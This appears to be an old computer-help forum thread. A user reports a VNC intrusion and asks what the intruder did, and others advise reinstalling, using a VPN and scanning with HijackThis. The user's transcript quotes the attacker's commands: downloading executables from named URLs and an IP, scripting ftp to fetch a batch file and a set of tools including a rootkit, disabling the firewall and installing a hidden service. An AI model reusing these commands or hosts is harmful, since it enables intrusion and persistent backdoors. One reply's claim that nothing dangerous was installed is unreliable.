Tom's Guide | Tom's Hardware | Tom's Games
![]() |
![]() |
![]() |
Couple of days ago a hacker got access to my pc, installed a lot af programs and viruses, i dont know what else they did, I would like to find out who they are, what they did, and also if my pc is still infetcted or under survelliance, I got it recorded, can anybody help

How do you know it was a hacker? Are you the only user of that computer?
The payload for many viruses and trojans is more virus, trojans, spyware and other bad things.
The answer to your question is "probably".What steps have you taken to detect/remove the bad things on your computer and what do you have in place to prevent such things from happening?

Don't waste your time trying to track some kid from China.
If you REALLY have been hacked, and what you describe does not sound like a hacker but a malware infection, you have no choice but to wipe the drive and do a new OS install.
Only restore backed up data files and nothing else. Reason for new install and only files is there are too many ways to make back doors into your system without you knowing or being able to find them.
If you really were hacked it means you are not behind a router nor do you have firewall software on your pc. You need to correct both before you put this pc back on the internet. Unless you like going thru this multiple times.
Give a person a fish, they eat for a day. Suggest they internet search and they learn a skill for a lifetime.

I ve been using VNC, in order to connect from my office to my home, thats how they got into my pc, some how they were able to get connected using the vnc, and as soon as we were using the computer they get disconnected, I was using windows firewall, and now i have Norton Internet Security and purchased a new router w/firewall, also downloades comodo firewall. Like i said i knew something was going on so i installed Pc anywere got conected to my house and let it recording overnight, thats how i knew what they were doing,( I have the recording on file).
Thay installed something from this web site:www.the-bling.com/hummm.exe and also this one: 76.173.251.129:81/csrss.exe, i got this one removed using your posts, it was difficult to get rid of, then they did some series of thins on the command prompt, and inally they installed some programs from www.digitalabs.gr etc...
If you want i can type every thing they did, let me know if i am in risk please

You'd have better luck with this in the Security Forum. However, the best advice is don't connect to your work computer from home and vise versa without a VPN.
Life's more painless for the brainless.

If your password was easy to guess it could have been anyone.
It could have been some one who has access to your work computer. There are many ways they could have gotten your password.If you have not changed your VNC password, your computer is deffinately wide open to those who used it earlier.
As wanderer mentioned, you should reformat your hard drive and perform a fresh install of windows.
All the firewalls in the world won't do you any good if they're all configured to let some one access VNC from the outside and some one gets your VNC password.

i deleted the vnc,
would any body be ABLE to check what they did and also, tell me IF YOU COULD FIND OUT WHO THEY ARE, what you can do to them?thanks for your replies

Use HiJackThis to track down or check for possible infections.
Here is all the the info needed to empower yourself, anything you are not sure of, put into a search engine like Google.
Read this link 1st, it has step by step.
http://www.wilderssecurity.com/show...
Important: Create a specific folder on your hard drive called HijackThis to keep its backups.
You can do this by going to My Computer (Windows key+e) then double click on C: then right click and select New then Folder and name it HijackThis. Download and unzip HijackThis.exe into this folder.
http://www.merijn.org/downloads.html Or, http://tomcoyote.com/hjt/ Or, http://www.spywareinfo.com/~merijn/...
If possible run HJT in Normal mode ( not Safe ) with all your normal startup's working.
HijackThis Tutorial - How to Analyse your own log.
http://spywarewarrior.com/viewtopic...
http://hometown.aol.co.uk/jrmc137/h...
http://www.bleepingcomputer.com/tut...
http://www.malwarehelp.org/understa...
HijackThis log file analysis ( online )
http://hijackthis.de/index.php?lang...
Or,
http://startup.networktechs.com/pag...
http://hjt.iamnotageek.com
Malware Prevention: Prevent Re-infection
http://wiki.castlecops.com/Malware_...

Ever hear of TightVNC? This is what is to be used via internet. Though Jennifer gave you the best advice. Only via vpn.
Don't waste your lifespan on hijack this or trying to discover who the intruder was. You left the barn door open. You just paid someone to give you a fantastic lesson on network and pc security. Be glad.
You should sign up for a credit card watch and put a hold on any major changes dealing with your bank cards/bank accounts. If you have used your pc to order stuff online or do online banking there may be records of these transactions the hacker got.
Give a person a fish, they eat for a day. Suggest they internet search and they learn a skill for a lifetime.

>>>would any body be ABLE to check what they did and also, tell me IF YOU COULD FIND OUT WHO THEY ARE, what you can do to them?<<<
Unless you have:
1. A specific IP address
2. Exact time of day and
3. Length of time they had access to your machine to "hack" youNo...
(and that's not taking into account that whether you were really hacked and an IP address was spoofed)

I got all that...
this is what they did:installed something from this website:
the-bling.com/hummm.exe
installed
76.173.251.129:81/csrss.exe
run/ cmd
c:\echo open 217.91.29.10 21 >> c:\ftp.txt
c:\echo user anonymous >> c:\ftp.txt
c:\echo blank >> c:\ftp.txt
c:\echo type binary >> c:\ftp.txt
c:\echo get DDSXP.bat >> c:\ftp.txt
c:\echo quit >> c:\ftp.txt
c:\ftp.exe -i -n -v -s:c:\ftp.txt
ftp>open 217.91.29.10 21
ftp>user anonymous
ftp>type binary
ftp>get DDSXP.bat
ftp>quit
c:\
then on windows firewall he unbloked "File Transfer Program"
then he disable "windows firewall"
runned DDSXP.bat on cmd
c:\DDSXP.bat
ftp>217.91.29.10 21
ftp>user anonymous
ftp>type binary
ftp>get regsvc.exe
ftp>get wmipjobj.mof
ftp>get signon.txt
ftp>get ServiceDaemon.exe
ftp>get ssh.exe
ftp>get Fport.exe
ftp>get dirchange.txt
ftp>get pslist.exe
ftp>get pskill.exe
ftp>get hxdef100.ini
ftp>get hxdef100.exe
ftp>quit
c:\
all those file were stored in a hidden folder named "here", placed at: c:\windows\java\classes\here
then he typed
c:\regsvc /I
registry services started successfully
c:\hxdef100.exe
run:
www.digitalabs.gr/preview/temp/test/winrar.exe (douwloaded and installed)
then
www.sendspace.com/file/9mys0e
downloaded (re.rar)
then
www.rarlab.com
downloaded and installed
WinRAR 3.70 beta 5 (wrar37b5.exe)
on windows
he extracted these files from re.rar
dhcpcl.exe
wrt.acx
copied and pasted them in this directory
c:\windows\java\trustlib\
then
prompt:
c:\windows\java\trustlib\dhcpcl.exe /i /h
c:\windows\java\trustlib\net start dhcpcl.exe
-----well thats all they did, my best interest would be to get my hadns on this f.. people, but at the same time, i wanna share my bad experience so people can learn all the risks we have when we dont have protection.
Please somebody tell me if these programs installed in my pc were dangerous, what were the porpouses, and how can they get my personal info now?
thans a lot por your posts

Nothing dangerous, all the guy did was install some service, and disable your firewall, looks like the intent was to be able to continue connecting to your computer and use it for who knows what.
If you are in anyway serious about catching the people that altered your computer you need to forget about the computing.net forum and contact your local police agency or local beurau of investigation.
If you don't want to do that, then reformat your hard drive and chalk it up as a lesson learned.

I really appreciatte your help and comments, I found the ip adress and called the ISP provider, "Road Runner in VA" this is what they said:
Hello,
Road Runner is unable to release any information regarding subscriber
accounts, including customer-identifying information (name, address,
phone), or actions taken against a subscriber account (suspension,
account termination, etc), without a proper subpoena or court order.You may address such documents to:
Custodian of Records
Road Runner HoldCo, LLC
13241 Woodland Park Rd
Herndon, VA 20171You may also fax your document to (703) 345-3607 - Attention: Custodian
of Records.
----------so that means I am screwed, this companies dont help at all, I also went to the police and they told me unless somebody stealed from you we can not open a report, I said, well they got into my personal property, they again said, If nothing has been stolen from you, there is nothing we can do.
so once again nobody seems to care.Thank you guys
you've been really helpfull

![]() |
![]() |
![]() |

This post is quite old and has been locked from receiving new replies. Please create a new posting instead.
| Ads by Google |